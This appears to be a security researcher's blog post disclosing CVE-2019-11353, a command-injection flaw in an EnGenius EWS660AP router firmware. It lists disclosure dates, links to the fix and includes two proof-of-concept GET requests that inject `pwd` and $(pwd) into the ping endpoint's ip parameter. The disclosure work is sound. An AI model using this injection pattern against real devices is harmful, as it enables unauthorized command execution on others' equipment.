CVE-2019-11353 – EnGenius EWS660AP Arbitrary Code Execution

Hello, from the other side of the ether!

Just making a quick post to briefly highlight an arbitrary code execution flaw in an EnGenius router. You can find more information regarding this flaw below:

CVE Founder: Max Segura
Vendor: EnGenius
Software: EWS660AP
Version: Firmware 2.0.284
Vulnerability: Arbitrary Code Execution
Reported: 4-03-19
Fix Discovered: 4-15-19 on ticket #12727
National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2019-11353

Intro

It is important to note that this flaw impacts the annotated version above, but could potentially affect other versions except the latest version of 3.5.0.11 that is currently available. If you are a business using this type of device, you are encouraged to visit the EnGenius main website at https://www.engeniustech.com/engenius-firmware-updates.html to keep your products up to date.

Remember to test responsibly and only on devices you own 🙂

Proof of Concept

This router supports a myriad of functions and utilities through BusyBox. Two utilities that the router uses are ping and traceroute. These can be abused to run alternate commands by using or $().

and $() are enabled functions on the router’s core operating system that allows command substitution or execution by allowing these commands to be evaluated within another command.

Here are some images demonstrating how you can alter the requests sent to the router then seeing the output on the page.

GET /cgi-bin/luci/;stok=881c7d2ca114c987a08ea8707aabd826/html/doPing?ip=`pwd`&size=64&num=4&addresstype=ipv4&t=1554749403990 HTTP/1.1

You can also send the following using $():

GET /cgi-bin/luci/;stok=881c7d2ca114c987a08ea8707aabd826/html/doPing?ip=$(pwd)&size=64&num=4&addresstype=ipv4&t=1554749403990 HTTP/1.1

pwd

pwd_output

This flaw was fixed on firmware version 3.5.0.11, please be sure to check the link above to upgrade your devices.

Until next time,
Happy Easter!

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s